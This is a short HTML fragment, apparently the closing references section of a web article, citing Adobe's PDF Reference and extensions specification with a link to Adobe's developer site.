<div class="MsoNoSpacing"><span style="font-size: large;">References</span><o:p></o:p></div><div class="MsoNoSpacing">[1] “PDF Reference and Adobe Extensions to the PDF Specifications”, Available at <a href="http://www.adobe.com/devnet/pdf_reference.html">http://www.adobe.com/devnet/pdf_reference.html</a><o:p></o:p></div></div>